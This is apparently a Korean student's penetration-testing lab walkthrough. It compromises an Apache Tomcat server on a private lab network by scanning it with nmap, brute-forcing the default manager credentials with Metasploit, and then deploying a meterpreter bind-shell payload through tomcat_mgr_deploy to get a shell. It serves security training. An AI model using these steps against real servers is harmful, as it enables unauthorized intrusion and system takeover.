모의해킹 따라하기 웹 해킹 1534023 김 지수 2017.04.07
[ Putty ] ① Ifconfig =>현재 나의 IP확인 ② nmap –sSV 192.168.111.0/24
[ 192.168.111.202:8180 ] ③ firefox & : 브라우저 실행 192.168.111.202 => IP주소 입력 홈페이지 접속 확인
[ Terminal ] ④ msfconsole => 메타스플로잇 연결 msf > search tomcat => 연결 포트 확인
[ Terminal ] ⑤ msf > use (톰캣 연결 구문 복사) = use auxiliary/scanner/http/tomcat_mgr_login ⑥ set RHOSTS 192.168.111.202 => 나의 IP ⑥ set RPORT 8180 => 8180
[ Terminal ] ⑦ exploit => 계정과 패스워드 확인
[ 192.168.111.202:8180 ] ⑧ 다시 브라우저 재 접속 Tomcat Manager 앞에서 확인했던 아이디 패스워드 입력 (tomcat : tomcat)
[ Terminal ] ⑨ search tomcat exploit/multi/http/tomcat_mgr_deploy 구문 복사
[ Terminal ] ⑩ use (복사 구문 =) exploit/multi/http/tomcat_mgr_deploy ⑪ set PASSWORD tomcat => 패스워드를 tomcat으로 설정 ⑫ set USERNAME tomcat => username tomcat으로 설정 ⑬ set RHOST 192.168.111.202 => IP주소 재 설정 ⑭ set RPORT 8180 => 포트 번호 재 설정
[ Terminal ] ⑮ set payload java/meterpreter/bind_tcp ⑯ exploit
[ Terminal ] ⑰ shell ⑱ ls ⑲ exit
[ Terminal ] ⑰ shell ⑱ ls =>목록 확인 ⑲ exit
[ Terminal ] ⑳ meterpreter > sysinfo =>상대방의 정보를 획득 확인
감사합니다.